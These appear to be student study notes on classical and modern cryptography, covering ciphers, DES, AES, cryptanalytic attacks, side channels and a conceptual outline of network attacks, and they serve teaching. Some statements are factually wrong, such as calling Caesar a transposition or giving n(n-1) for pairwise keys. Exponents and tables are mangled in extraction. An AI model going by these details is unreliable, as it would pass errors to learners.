Confusion and Diffusion Confusion: Obscures the relationship between the plaintext message and the ciphertext. This frustrates the attempts to study the ciphertext looking for redundancies and statistical patterns. The easiest way to do this is through substitution. Caesar cipher is one in which every identical letter of plaintext is substituted for a single letter of ciphertext. Modern substitution ciphers are much more complex: a long block of plaintext is substituted for a different block of ciphertext and the mechanics of the substitution change with each bit in the plaintext or key. This type of substitution is not necessarily enough e.g. the German Enigma is a complex substitution algorithm that was broken during WWII. A confusion good cipher ensures that data at a given position in the plaintext doesn't correspond too closely to information at the same position in the ciphertext Diffusion: Dissipates the redundancy of the plaintext by spreading it out over the ciphertext. A cryptanalyst looking for those redundancies will have a harder time finding them. The simplest way to cause diffusion is through transposition (also called a permutation). A simple transposition cipher, like columnar transposition, simply rearranges the letters of the plaintext. Modern ciphers do this type of permutation but they also employ other forms of diffusion that can diffuse parts of the message throughout the entire message. A good diffusion cipher ensures that even small changes in the plaintext result in large changes to the ciphertext Stream ciphers 'One at a time' rely on confusion alone, although some feedback schemes add diffusion. Block 'Chunk at a time' algorithms use both confusion and diffusion. As a general rule, diffusion alone is easily cracked (although double transposition ciphers hold up better than many other pencil-and-paper systems). Steganography: Art and science of writing hidden messages in such a way that no one apart from the sender and intended recipient even realizes there is a hidden message. One way of keeping confidentiality - meaning keeping the existence of message hidden. Example of Security through obscurity, once someone finds out what you have done, it's worth nothing. Examples include: Greeks sent messages on a board written in pen, then put wax on the board and wrote an innocuous message on the wax to keep it hidden. Writing messages on a slave's head, and letting the hair grow out. Germans wrote messages in newspaper by putting pinholes in it, which could be read by holding up to the light.

Caesar Cipher

Caesar cipher: simple transposition of entire alphabet with an upper bound of 26!. is a a monoalphabetic cipher. reputedly used by Julius Caesar To use the Caesar cipher you simply replace each letter of message by a letter a fixed distance away eg use the 3rd letter on.
Example L FDPH L VDZ L FRQTXHUHG I CAME I SAW I CONQUERED

ie mapping is
ABCDEFGHIJKLMNOPQRSTUVWXYZ DEFGHIJKLMNOPQRSTUVWXYZABC

You can describe this cipher as: Encryption Ek : i -> i + k mod 26 Decryption Dk : i -> i - k mod 26 Cryptanalysis of the Caesar Cipher only have 26 possible ciphers could simply try each in turn - exhaustive key search
GDUCUGQFRMPCNJYACJCRRCPQ HEVDVHRGSNQDOKZBDKDSSDQR IFWEWISHTOREPLACELETTERS JGXFXJTIUPSFQMBDFMFUUFST KHYGYKUJVQTGRNCEGNGVVGTU LIZHZLVKWRUHSODFHOHWWHUV MJAIAMWLXSVITPEGIPIXXIVW

Plain

Cipher -

also can use letter frequency analysis


Single Letter Letter E T R Double Letter TH HE IN Triple THE AND TIO

N I O A S

ER RE ON AN EN

ATI FOR THA TER RES

These are easy to crack because there are lots of redundancy and predictability in English , if you missed a few word, you can still restructure the sentence. We can use frequency analysis,as long as the language they're written in is susceptible to that approach (eg this is easy in English and German, but hard in Chinese). When we use simple substitution/transposition, cipher Frequency analysis works because the frequency characteristics of the original letter will be passed on to the new letters. We will need to know the average frequency of every letter in the language, then we count the occurrence of each symbol in this piece of encrypted text and use these information to find mapping for very common/uncommon letters. English Character Frequencies

in most languages letters are not equally common in English e is by far the most common letter have tables of single double & triple letter frequencies these are different for different languages

Vigenere Cipher
Vulnerable to Frequency Attacks Vigenere cipher: generalisation of Caesar, encode using random permutation of entire alphabet In a Caesar cipher, each letter of the alphabet is shifted along some number of places; for example, in a Caesar cipher of shift 3, A would become D, B would become E and so on. The Vigenre cipher consists of several Caesar ciphers in sequence with different shift values.

To encipher, a table of alphabets can be used, termed a tabula recta, Vigenre square, or Vigenre table. It consists of the alphabet written out 26 times in different rows, each alphabet shifted cyclically to the left compared to the previous alphabet, corresponding to the 26 possible Caesar ciphers. At different points in the encryption process, the cipher uses a different alphabet from one of the rows. The alphabet used at each point depends on a repeating keyword. For example, suppose that the plaintext to be encrypted is:
ATTACKATDAWN

The person sending the message chooses a keyword and repeats it until it matches the length of the plaintext, for example, the keyword "LEMON":
LEMONLEMONLE

The first letter of the plaintext, A, is enciphered using the alphabet in row L, which is the first letter of the key. This is done by looking at the letter in row L and column A of the Vigenre square, namely L. Similarly, for the second letter of the plaintext, the second letter of the key is used; the letter at row E and column T is X. The rest of the plaintext is enciphered in a similar fashion:
Plaintext: Key: Ciphertext: ATTACKATDAWN LEMONLEMONLE LXFOPVEFRNHR

Decryption is performed by finding the position of the ciphertext letter in a row of the table, and then taking the label of the column in which it appears as the plaintext. For example, in row L, the ciphertext L appears in column A, which taken as the first plaintext letter. The second letter is decrypted by looking up X in row E of the table; it appears in column T, which is taken as the plaintext letter. Vigenre can also be viewed algebraically. If the letters AZ are taken to be the numbers 025, and addition is performed modulo 26, then Vigenre encryption can be written, and decryption,

Playfair Cipher
The Playfair cipher or Playfair square is a manual symmetric encryption technique. The Playfair cipher encrypts pairs of letters (digraphs), instead of single letters. This is significantly harder to break since the frequency analysis used for simple substitution ciphers is considerably more difficult. Example To encipher a message in Playfair, pick a keyword and write it into a five-by-five square, omitting repeated letters and replacing J with I. In this example, we use the keyword MANCHESTER and write it into the square by rows. Follow the keyword with the rest of the alphabet's letters in alphabetical order. Replace J with I.
M E D L V A S F O W N T G P X C R I Q Y H B K U Z

First we need to prepare the plaintext message for encryption. To encrypt "The secret message" break it up into capitalised two-letter groups. If both letters in a pair are the same, insert an X between them. If there is only one letter in the last group (odd number of letters), add an X to it. Replace J with I
TH IS SE CR ET ME SX SA GE IS EN CR YP TE DX

The cipher replaces pairs of letters, the following are the rules for encrypting: 1. If the letters appear on the same row of your (key) table, replace them with the letters to their immediate right respectively, wrapping around to the left side of the row if necessary. For example, using the table above, the letter pair FK would be encoded as GD. 2. If the letters appear on the same column of your (key) table, replace them with the letters immediately below, wrapping around to the top if necessary. For example, using the table above, the letter pair SO would be encoded as WF. 3. If the letters are on different rows and columns, replace them with the letters on the same row respectively but at the other pair of corners of the rectangle defined by the original pair. The order is important - the first letter of the pair should be replaced first. For example, using the table above, the letter pair AR would be encoded as CS.. Now we encrypt each two-letter group. The first pair of letters to encrypt is T and H. Find the T and H in the (key) square.
. . . . . . . . . . N T . . . . . . . . H B . . .

Replace TH with those letters, starting with the letter on the same row as the first letter of the pair: TH becomes BN. Continue this process with each pair of letters:
TH IS SE CR ET ME SX SA GE IS EN CR YP TE DX BN FR

Notice that S and E are in the same row. In this case we take
. E . . . . S . . . . T . . . . . . . . . . . . .

the letter immediately to the right of each letter of the pair, so that SE becomes TS.
TH IS SE CR ET ME SX SA GE IS EN CR YP TE DX BN FR TS

Now we see that C and R are in the same column. Use the letter
. . . . . . . . . . . . . . . C . R . I . . . . .

immediately below each of these letters, so that CR becomes RI. This is the last special case, and the encryption proceeds without further incident.
TH IS SE CR ET ME SX SA GE IS EN CR YP TE DX BN FR TS RI SR ED TW FS DT FR TM RI XQ RS GV

To decrypt the message, simply reverse the process: If the two letters are in different rows and columns, take the letters in the opposite corners of their rectangle. If they are in the same row, take the letters to the left. If they are in the same column, take the letters above each of them.

Attack Methods
1. Kevin Mitnick attack on Shimomura TCP sequence number prediction attack against work machine only worked because it was a low-traffic time period DoS attack against home machine so that it can't annihilate the shadow connection KM spoofing Leverages insecure (IP-address-based) authentication of RLOGIN system 2. Access Control principles deny by default allow only what's absolutely necessary role based group users into 'roles'

access control becomes less ad-hoc and more manageable authentication definition: proving your identity to a system, such that you can exercise the rights granted by the security configuration of that system 1. something you know 2. something you have 3. something you are rsa

Anatomy of an attack
Beforehand Gather Information: Do passive (you cannot get caught) or active recon - you can get caught (Google's trash bins, port scans). Active means getting your hards dirty, whilst passive means non-detectable actions like listening to a phone conversation of someone on a bus. Note that passive isn't going through someone's rubbish wearing gloves, as you are directly interfering. Surveillance: What programs is your target running? What time does everyone leave? Is there an easy way to get passwords? What exploits can an attacker use? For example, if you can find out they are using an outdated version of the unix utilityfinger, it has a 1024 character long, unchecked buffer which can be exploited. Intermediate surveillance Keep a database of identities with statistics on their system nmap can produce identity databases (remember legal issues). nmap floods a machine with packets, it's not a passive thing. Don't do this without telling people. Start the attack Do your exploit. Get user access. Then conduct some privilege acceleration to obtain root access. This is often done by exploiting further vulnerabilities. The ultimate aim is to gain local access and then escalate privileges Example: Try see what software, version they are running. Find out when people are distracted, what are the interesting machines? Recon: either passive or active Look for errors, sometimes error message that might demonstrate a version number. Ideally you would do passive surveillance, if you do active then there is more chance of you getting caught or tripping off an alarm. There are 2 different ways: You've seen through the exploit lab/seminar that if you are given access to a machine, then we can run an exploit to spawn a shell, the you get access to machine as a legitimate user and the machines programs, and then from there you could try privallege escalation (if you are able to run a program as root and then spawn a shell, you have root access). Brute force - just finger thousand of machines, and a small percentage them would likely be vunerable.

Technical Attacks
3 stages: reconnaissance: finding out how the system works

penetration: gaining access to system privilege escalation: converting that access to a kind where you can do nefarious things most modern computers are based on a 'von neumann' architecture: no difference between data and code C trusts whatever code it's executing -> easy to overwrite important execution data: buffer overflow attack Side Channel Attacks A side-channel is a channel that occurs as a side-effect of the 'main' channel. In cryptography, the main channel is the encryption/decryption algorithm, and the side channels are pieces of information given away by the specific implementation of the algorithm. While the information inside a main channel (i.e the plaintext and key) does not directly leak into a side channel. Side channel contains meta-information about the main channel. Example: an attacker may not be able to crack an encrypted file (the main channel). However, the size of the encrypted file is a side-channel that may be related to the size of the original file. Combining this information with other side-channels (e.g the file name, when it was created, who created it), an attacker may be able to deduce the nature of the original file, or even narrow down the possible keys used to encrypt it. Substitution Man-In-The-Middle Attack It is an attack in which are third party sittings in the middle of a communication of a sender and receiver and is able to read, view and/or modify the data being sent. The Substitution attack is able able to be performed against a Synchronised Stream Cipher without having to know the key. In this attack the user can substitute a piece of information A for another piece of information B if they know where A occurs in the stream of bits. Example For simplicity lets say the information A is 101, information B is 011 and the key is some three bit stream that has mangled to be 110 The encoder sending information A XORs the bits together with the mangled key to send the message 110 XOR 101 which results in 011 Then the attacker without knowing the key takes the sent message XOR information A with data 011 XOR 101 which results in 110 Then the attacker adds their information B with the XOR function 110 XOR 011 which results in 101 Which is sent down the line and decoded, this is all down without having to know the key. Cryptanalytic Attack

The following table describes types of cryptanalytic attack, where: P is plaintext C is ciphertext E is a encryption function k is a key

General Types of Cryptanalytic Attack


Type Required Purpose Recover the plain text of as many messages as possible, or to deduce the key(s) used to encrypt messages, in order to decrypt other messages encrypted with the same algorithm.

Ciphertext-only attack

Ciphertext of several messages, which have been encrypted with the same encryption algorithm.

Formula: Given C1 = Ek (P1 ), C2 = Ek (P2 ),...Ci = Ek (Pi ) Deduce P1 ,P2 ,...Pi ;k; or an algorithm to infer P i+1 from Ci+1 = Ek (Pi+1) Ciphertext of several messages, as well as the plaintext associated with these messages. Known-plaintext attack Deduce the key(s) used to encrypt messages, or an algorithm to decrypt new messages encrypted with the same key(s).

Formula: Given P1 , C1 = Ek (P1 ), P2 , C2 = Ek (P2 ),...Pi ,Ci =


Ek (Pi )

Deduce either k, or an algorithm to infer Pi+1 from Ci+1 = Ek (Pi+1) Ciphertext of several messages (and associated plaintext), but also the ability to choose which plaintext gets encrypted (and hence, the ability to taylor attacks to find out more about the key). Deduce the key(s) used to encrypt messages, or an algorithm to decrypt new messages encrypted with the same key(s).

Chosen-plaintext attack

Formula: Given P1 , C1 = Ek (P1 ), P2 , C2 = Ek (P2 ),...Pi ,Ci =


Ek (Pi )

where the cryptanalyst gets to choose P1 , P2 ,...Pi Deduce either k, or an algorithm to infer Pi+1

from Ci+1 = Ek (Pi+1) Ciphertext of several messages (and associated plaintext), and the ability to choose which plaintext gets encrypted, as well as the ability to modify the choice of plaintext based on the results of the previous encryption. Deduce the key(s) used to encrypt messages, or an algorithm to decrypt new messages encrypted with the same key(s).

Adaptive-chosen-plaintext attack
(special case of choosen-plaintext attack)

Formula: Given P1 , C1 = Ek (P1 ), P2 , C2 = Ek (P2 ),...Pi ,Ci =


Ek (Pi )

where the cryptanalyst gets to choose P1 , P2 ,...Pi Deduce either k, or an algorithm to infer Pi+1 from Ci+1 = Ek (Pi+1)

Other Types of Cryptanalytic Attack


The ability to choose different ciphertexts to be decrypted, and access to the decrypted plaintext. Deduce the key.

Chosen-ciphertext attack

Formula: Given C1 , P1 = Dk (C1 ), C2 , P2 = Dk (C2 ),...Ci ,Pi =


Dk (Ci )

Deduce k, This doesn't mean you get to choose the key, but that you have information about the relationships between keys You threaten, blackmail or torture someone so they give you the key.

Chosen-key attack

Deduce the key

Rubber-hose cryptanalysis
(Bribery sometimes referred to as a purchase-key attack)

Deduce the key

Sniffing
A sniffer is a program and/or device that monitors data travelling over a network. Examples of sniffing devices include tiny microphones/cameras and keyloggers 'Echelon': Since the Patriot Act the NSA has the power to sniff everything. Now everybody's trying to route their traffic around the US. 1. Sniffing a network that uses hubs - A very small linux computer will do the trick. 2. Switched networks

3. Switches - unicast devices 4. Need some way to direct traffic 5. Address Resolution Protocol (ARP) table poisoning ARP poisoning is a type of 'Man-In-The-Middle' attack (one of many sniffing techniques)

Example: Tempest Attack Read EMF leakage of computer screens, recombine and then deduce what is going on Holland intelligence agencies showed that a tempest attack can be used to read electronic voting computer screens

Week4/NiceNotes
Modern Symmetric Ciphers
Symmetric Key Cryptography, or Secret Key Cryptography refers to a method where a single key is used for both encryption and decryption. The algorithm used to encrypt the message must also be reversible. The strength of a cipher is how much work is required to break it using brute force. A key of n-bits has n-bits of security. We say an encryption has x-bits strength if it takes O(2^x) to break it by brute forcing. A cipher is considered broken if it takes less than brute force time to decrypt. Block ciphers break the input into fixed sizes blocks and encrypt each block.

Stream ciphers encrypt the input 'on the fly', usually involving XOR-ing the input stream with a cipher stream. You need to remember that having a cipher is not all you need, you need to use it in a secure way. nonce is a number you use once. Cipher: It's good enough, but it doesn't mean it will never be broken. The strength of the cipher required to protect the information highly depends on the information itself. The time importance - Is the information still useful if it's broken tomorrow? The level of importance - How important the information is? Example: RC4 used in WEP, a key is the seed to a 'secure random bit generator', which is XOR'd with the input, the recipient uses the same key to generate the same bit stream, XOR'ing the cipher text, producing the plaintext. Problem: the first few bits were very dependent on the key, so it was easy to break. Possible solution: padding, throw away the first 50 or so bytes. The reason WEP attacks were so easy, was not a problem with RC4, but a problem with the particular implementation of RC4 in WEP. Wep for every single frame it sent, it re-started the random generator -> get information about the key wep -> example badly implemented cipher Problems with RC4 The first weakness is the existence of large classes of weak keys, in which a small part of the secret key determines a large number of bits of the initial permutation (KSA output). In addition, the Pseudo Random Generation Algorithm (PRGA) translates these patterns in the initial permutation into patterns in the pre fix output stream, and thus RC4 has the undesirable property that for these weak keys its initial outputs are disproportionally affected by a small number of key bits. The second weakness is a related key vulnerability, which applies when part of the key presented to the KSA is exposed to the attacker. It consists of the observation that when the same secret part of the key is used with numerous different exposed values, an attacker can rederive the secret part by analyzing the initial word of the keystreams with relatively little work. This concatenation of a long term secret part with an attacker visible part is a commonly used mode of RC4, and in particular it is used in the WEP (Wired Equivalent Privacy) protocol, which protects many wireless networks.

Keys
Shared, secret key: With this form of cryptography, it is obvious that the key must be known to both the sender and the receiver; that, in fact, is the secret (i.e. there must be a shared, secret key). The biggest difficulty with this approach, of course, is the distribution of the key. Disadvatage: One disadvantage of symmetric-key algorithms is the requirement of a shared secret key, with one copy at each end. The process of selecting, distributing and storing keys is known as key management, and is difficult to achieve reliably and securely.

Problems With Keys: Managing Keys If there is a group of n people and each pair wants a unique key to use in a Symmetric Key System, then the number of keys in the system is n(n-1). This is quadratic growth, so as n increases the keys become unmanageable and hard to keep secret. In a secure Asymmetric Key System the number is a linear growth. Keys are a weakest link Since the only secret part of process, other then the plain text, is the key, once the key is lost all messages encrypted with that key are now accessible. Also a new set of keys must be distributed.

Speed
Symmetric-key algorithms are generally much less computationally intensive than asymmetric key algorithms. In practice, asymmetric key algorithms are typically hundreds to thousands times slower than symmetric key algorithms.

Categories
The S-Box - Substitution Cipher
Each S-box takes in a 6-bit input and produces a 4-bit output. Provides confusion. Each S-box has a table of 4 rows by 16 columns and where each entry is a 4-bit number. Input bits 1 and 6 combine to form a 2-bit number, which corresponds to the row in the S-box. Input bits 2, 3, 4 and 5 combine to form a 4-bit number, which corresponds to the column in the S-box. The 4-bit number at the corresponding row and column is used as the 4-bit output.

The P-Box - Permutation Cipher


Reorders the 32-bit input from the S-boxes to produce a new 32-bit output. Provides diffusion. Output bit Input bit Output bit Input bit 1 16 17 2 2 7 18 8 3 20 19 24 4 21 20 14 5 29 21 32 6 12 22 27 7 28 23 3 8 17 24 9 9 1 25 19 10 15 26 13 11 23 27 30 12 26 28 6 13 5 29 22 14 18 30 11 15 31 31 4 16 10 32 25

32-bit output based on 32-bit input

Symmetric-key algorithms can be divided into stream ciphers and block ciphers. Stream ciphers operate on a single bit (byte or computer word) at a time. They may implement some form of feedback mechanism so that the key is constantly changing. Block ciphers take a number of bits (chunk) and encrypt them as a single unit. In general, the same plaintext block will always encrypt to the same ciphertext when using the same key in a block cipher whereas the same plaintext will encrypt to different ciphertext in a stream cipher.

Stream Ciphers
Stream cipher is a symmetric key cipher where plaintext bits are combined with a pseudorandom cipher bit stream (keystream), typically by an exclusive-or (xor) operation. In a stream cipher the plaintext digits are encrypted one at a time in chain mode, and the transformation of successive digits varies during the encryption. An alternative name is a state cipher, as the encryption of each digit is dependent on the current state. There are several types of stream ciphers, but here are a couple of the main ones: Self-synchronizing cipher uses several of the previous N ciphertext digits to compute the keystream. Such schemes are known as self-synchronizing stream ciphers, asynchronous stream ciphers or ciphertext autokey (CTAK) It is termed "self-synchronizing" because the decryption process can stay synchronized with the encryption process merely by knowing how far into the n-bit keystream it is.The advantage that the receiver will automatically synchronise with the keystream generator after receiving N ciphertext digits, making it easier to recover if digits are dropped or added to the message stream. Single-digit errors are limited in their effect, affecting only up to N plaintext digits Synchronous Synchronous stream cipher a stream of pseudo-random digits are generated independently of the plaintext and ciphertext messages, and then combined with the plaintext (to encrypt) or the ciphertext (to decrypt). In the most common form, binary digits are used (bits), and the keystream is combined with the plaintext using XOR. This is termed a binary additive stream cipher. In a synchronous stream cipher, the sender and receiver must be exactly in step for decryption to be successful. If digits are added or removed from the message during transmission, synchronisation is lost. To restore synchronisation, various offsets can be tried systematically to obtain the correct decryption. Another approach is to tag the ciphertext with markers at regular points in the output.

Block Ciphers
A block cipher operates on blocks of fixed length, often 64 or 128 bits. Because messages may be of any length, and because encrypting the same plaintext under the same key always produces the same output (as described in the ECB section below), several modes of operation have been invented which allow block ciphers to provide confidentiality for messages of arbitrary length. 1. Split input into fixed sized blocks. 2. Apply encryption function to each block.

The earliest modes described in the literature (eg, ECB, CBC, OFB and CFB) provide only confidentiality or message integrity, but do not perform both simultaneously. Other modes have since been designed which ensure both confidentiality and message integrity in one pass, such as IAPM, CCM, EAX, GCM, and OCB modes. Block ciphers can operate in one of several modes; the following five are the most important: Electronic Codebook (ECB) mode is the simplest, most obvious application: the secret key is used to encrypt the plaintext block to form a ciphertext block. Two identical plaintext blocks, then, will always generate the same ciphertext block. Although this is the most common mode of block ciphers, it is susceptible to a variety of brute-force attacks. Encrypt each plaintext block using the same function and key.

One of the problems with ECB is that because the the same plaintext blocks will produce the same ciphertext block it does not hide data patterns well. In some senses, it doesn't provide serious message confidentiality, and it is not recommended for use in cryptographic protocols at all. A demonstration of this:

Original

Encrypted using ECB mode

Encrypted using other modes

Cipher Block Chaining (CBC) mode adds a feedback mechanism to the encryption scheme. In CBC, the plaintext is exclusively-ORed (XORed) with the previous ciphertext block prior to encryption. In this mode, two identical blocks of plaintext never encrypt to the same ciphertext. XOR input plaintext block with previous output cipher text block, then encrypt with key. Initialisation vector (IV) is required for very first input plaintext block.

Cipher Feedback (CFB) mode is a block cipher implementation as a self-synchronizing stream cipher. CFB mode allows data to be encrypted in units smaller than the block size, which might be useful in some applications such as encrypting interactive terminal input. If we were using 1-byte CFB mode, for example, each incoming character is placed into a shift register the same size as the block, encrypted, and the block transmitted. At the receiving side, the ciphertext is decrypted and the extra bits in the block (i.e., everything above and beyond the one byte) are discarded. cfb_encryption.jpg cfb_decryption.jpg Output Feedback (OFB) mode is a block cipher implementation conceptually similar to a synchronous stream cipher. OFB prevents the same plaintext block from generating the same ciphertext block by using an internal feedback mechanism that is independent of both the plaintext and ciphertext bitstreams. ofb_encryption.jpg ofb_decryption.jpg Counter (CTR) Use a counter with the key to generate a cipher stream. XOR the cipher stream with the input plaintext block to produce the cipher text. The counter add randomness, so the same input plaintext block will not produce the same cipher text block and hence prevent frequency analysis attacks. Lab/TheoryReviewNote/CTR.jpg Initialization Vector (IV) All these modes (except ECB) require an initialization vector, or IV -- a sort of 'dummy block' to kick off the process for the first real block, and also to provide some randomization for the process. There is no need for the IV to be secret, in most cases, but it is important that it is never reused with the same key. For CBC and CFB, reusing an IV leaks some information about the first block of plaintext, and about any common prefix shared by the two messages. For OFB and CTR, reusing an IV completely destroys security. In CBC mode, the IV must, in addition, be randomly generated at encryption time. Feistel Cipher

Fiestel Cipher: a Feistel cipher is a symmetric structure used in the construction of block ciphers. A large proportion of block ciphers use the scheme, including the Data Encryption Standard (DES). The Feistel structure has the advantage that encryption and decryption operations are very similar, even identical in some cases, requiring only a reversal of the key schedule. Therefore the size of the code or circuitry required to implement such a cipher is nearly halved. it is also commonly known as a Feistel network Feistel ciphers and similar constructions are product ciphers, and so combine multiple rounds of repeated operations, such as: Bit-shuffling (often called permutation boxes or P-boxes) Simple non-linear functions (often called substitution boxes or S-boxes) Linear mixing (in the sense of modular algebra) using XOR to produce a function with large amounts of what Claude Shannon described as "confusion and diffusion". Bit shuffling creates the diffusion effect, while substitution is used for confusion. Lab/TheoryReviewNote/Feistel.jpg 1. Input is split into two equal sized blocks L and R. 2. Ki = key for round i 3. For each round i, Li+1 = Ri Ri+1 = Li XOR F(Ki,Ri) 4. The function F does not have to invertible. Padding Block cipher algorithms like DES and Blowfish in Electronic Code Book (ECB) and Cipher Block Chaining (CBC) mode require their input to be an exact multiple of the block size. If the plaintext to be encrypted is not an exact multiple, you need to pad before encrypting by adding a padding string. When decrypting, the receiving party needs to know how to remove the padding in an unambiguous manner DES DES is a block cipher, based on a symmetric-key algorithm, that takes a fixed-length string of plaintext bits and transforms it through a series of complicated operations into another ciphertext bitstring of the same length. DES also uses a key to customize the transformation, so that decryption can supposedly only be performed by those who know the particular key used to encrypt. The key ostensibly consists of 64 bits; however, only 56 of these are actually used by the algorithm. Eight bits are used solely for checking parity, and are thereafter discarded. Hence the effective key length is 56 bits, and it is usually quoted as such. Like other block ciphers, DES by itself is not a secure means of encryption but must instead be used in a mode of operation.

Has a block size is 64 bits. Uses Feistel cipher for 16 rounds. DES is now considered to be insecure for many applications. This is chiefly due to the 56-bit key size being too small; In January, 1999, distributed.net and the Electronic Frontier Foundation collaborated to publicly break a DES key in 22 hours and 15 minutes The algorithm is believed to be practically secure in the form of Triple DES, although there are theoretical attacks. The cipher has been superseded by the Advanced Encryption Standard (AES). DES was too slow, Triple-DES (encrypt with 3 different keys, or encrypt, decrypt, encrypt - made it more secure, but not secure enough) Problem with DES: vulnerable to differential analysis The algorithm was initially controversial with classified design elements, a relatively short key length, and suspicions about a National Security Agency (NSA) backdoor. Lab/TheoryReviewNote/DES.jpg Structure There are 16 identical stages of processing, termed rounds. There is also an initial and final permutation, termed IP and FP, which are inverses (IP "undoes" the action of FP, and vice versa). IP and FP have almost no cryptographic significance, but were apparently included in order to facilitate loading blocks in and out of mid-1970s hardware, as well as to make DES run slower in software. Before the main rounds, the block is divided into two 32-bit halves and processed alternately; this criss-crossing is known as the Feistel scheme. The Feistel structure ensures that decryption and encryption are very similar processes the only difference is that the subkeys are applied in the reverse order when decrypting. The rest of the algorithm is identical. This greatly simplifies implementation, particularly in hardware, as there is no need for separate encryption and decryption algorithms. The red ! symbol denotes the exclusive-OR (XOR) operation. The F-function scrambles half a block together with some of the key. The output from the F-function is then combined with the other half of the block, and the halves are swapped before the next round. After the final round, the halves are not swapped; this is a feature of the Feistel structure which makes encryption and decryption similar processes. AES Is a block cipher. Replacement standard for DES, adopted in 2002. Uses blocks of size 128-bits. Key can be 128, 192 or 256 bits. Some implementations of AES are susceptible to side-channel (timing) attacks, due to information leakage. Sometimes referred to as Rijndael, though Rijndael allows for different block and key sizes. Unlike DES (the predecessor of AES), AES is a substitution-permutation network, not a Feistel network. In comparison to DES, AES is fast in both software and hardware, is relatively easy to implement, and requires little memory. Presently AES is considered to be secure with sufficiently long key length. Strictly speaking, AES is not precisely Rijndael (although in practice they are used interchangeably) as Rijndael supports a larger range of block and key sizes; AES has

a fixed block size of 128 bits and a key size of 128, 192, or 256 bits, whereas Rijndael can be specified with key and block sizes in any multiple of 32 bits, with a minimum of 128 bits and a maximum of 256 bits. Since in computing 1 byte equals 8 bits, the fixed block size of 128 bits is normally 128 / 8 = 16 bytes. AES operates on a 4!4 array of bytes, termed the state (versions of Rijndael with a larger block size have additional columns in the state). Most AES calculations are done in a special finite field. The cipher is specified in terms of repetitions of processing steps that are applied to make up rounds of keyed transformations between the input plain-text and the final output of cipher-text. A set of reverse rounds are applied to transform cipher-text back into the original plain-text using the same encryption key.

Attack Methods
Brute Force
For any cipher, the most basic method of attack is brute force trying every possible key in turn. The length of the key determines the number of possible keys, and hence the feasibility of this approach.

Differential Cryptanalysis
Differential analysis: The analysis which observes the effect of modification in the upper level(before encryption) on the resulted changes on the lower level(after encryption). Differential cryptanalysis is a general form of cryptanalysis applicable primarily to block ciphers, but also to stream ciphers and cryptographic hash functions. In the broadest sense, it is the study of how differences in an input can affect the resultant difference at the output. In the case of a block cipher, it refers to a set of techniques for tracing differences through the network of transformations, discovering where the cipher exhibits non-random behaviour, and exploiting such properties to recover the secret key. Differential cryptanalysis is usually a chosen plaintext attack, meaning that the attacker must be able to obtain encrypted ciphertexts for some set of plaintexts of his choosing. The scheme can successfully cryptanalyze DES with an effort on the order 247 chosen plaintexts. There are, however, extensions that would allow a known plaintext or even a ciphertext-only attack. The basic method uses pairs of plaintext related by a constant difference; difference can be defined in several ways, but the eXclusive OR (XOR) operation is usual. The attacker then computes the differences of the corresponding ciphertexts, hoping to detect statistical patterns in their distribution. The resulting pair of differences is called a differential. Symmetric ciphers have historically been susceptible to known-plaintext attacks, chosen plaintext attacks, differential cryptanalysis and linear cryptanalysis. Careful construction of the functions for each round can greatly reduce the chances of a success

The F Function
Lab/TheoryReviewNote/F_function.jpg

The Feistel function (F-function), depicted above, operates on half a block (32 bits) at a time and consists of four stages: 1. Expansion the 32-bit half-block is expanded to 48 bits using the expansion permutation, denoted E in the diagram, by duplicating some of the bits. 2. Key mixing the result is combined with a subkey using an XOR operation. Sixteen 48-bit subkeys one for each round are derived from the main key using the key schedule (described below). 3. Substitution after mixing in the subkey, the block is divided into eight 6-bit pieces before processing by the S-boxes, or substitution boxes. Each of the eight S-boxes replaces its six input bits with four output bits according to a non-linear transformation, provided in the form of a lookup table. The S-boxes provide the core of the security of DES without them, the cipher would be linear, and trivially breakable. 4. Permutation finally, the 32 outputs from the S-boxes are rearranged according to a fixed permutation, the P-box. E (Expansion function) Expands the 32-bit input into a 48-bit output by duplicating some bits. Output bit Input bit Output bit Input bit 1 32 25 16 2 1 25 17 3 2 27 18 4 3 28 19 5 4 29 20 6 5 30 21 7 4 31 20 8 5 32 21 9 6 33 22 10 7 34 23 11 8 35 24 12 9 36 25 13 8 37 24 14 9 38 25 15 10 39 26 16 11 40 27

48-bit generated from the 32-bit input The subkey 56-bit key divided into two 28-bit halves. On every round, each 28-bit half is circularly left shifted by 1 or 2 bits (depending on the round). 24-bits from each half are used to form the 48-bit key. Round Number 1 1 2 1 3 2 4 2 5 2 6 2 7 2 8 2 9 1 10 2 11 2 12 2 13 2 14 2 15 2 16 1

Number of key bits shifts per round Key bit Input bit Key bit 1 14 25 2 17 26 3 11 27 4 24 28 5 1 29 6 5 30 7 3 31 8 28 32 9 15 33 10 6 34 11 21 353 12 10 36 13 23 37 14 19 38 15 12 39 16 4 40

Input bit

41

52

31

37

47

55

30

40

51

45

33

48

44

49

39

56

The 48-bit subkey composed of bits from the 56-bit key DES-key-schedule.png

Side Channel Attacks


Side channel attacks do not attack the underlying cipher and so have nothing to do with its security as described here, but attack implementations of the cipher on systems which inadvertently leak data. There are several such known attacks on certain implementations of AES. Examples of side channel attacks: Timing attack - figuring out an attack by using knowledge of instruction times By observing how long it takes to encrypt various plaintext the with the same key, we can get hints about the key Power attack - figuring out and attack by using knowledge of instruction power consumption Power attack, say with a smartcard, the reader can measure how much power the card is drawing - hence figuring out what operations are going on!

Replay attack
Replay attack: Once you have seen that a particular ciphertext corresponds to a particular plaintext then you can replay that message.

Network Scans and Attacks


Sniffing is the term generally used for traffic monitoring within a network, while port scanning is used to find out information about a remote network. Types of Network Attack Some types of network attack: 1. Password cracking: using software to guess passwords to accounts. 2. Address spoofing: spoofed network commands into a network with a trusted IP address. 3. Impersonation: by tricking routers and the domain name registry, attackers can redirect traffic to their site. 4. Evesdropping (Sniffing): intercepting data in transit. 5. Exploits: exploiting software that has bugs. 6. Back doors: some software developers put in back doors intended for their use only, but these may be exploited. 7. Open doors: accidentally leaving the network open, which may be used by attacks. 8. Viruses and trojan horses 9. Social engineering 10. Denial of service Port Scanning

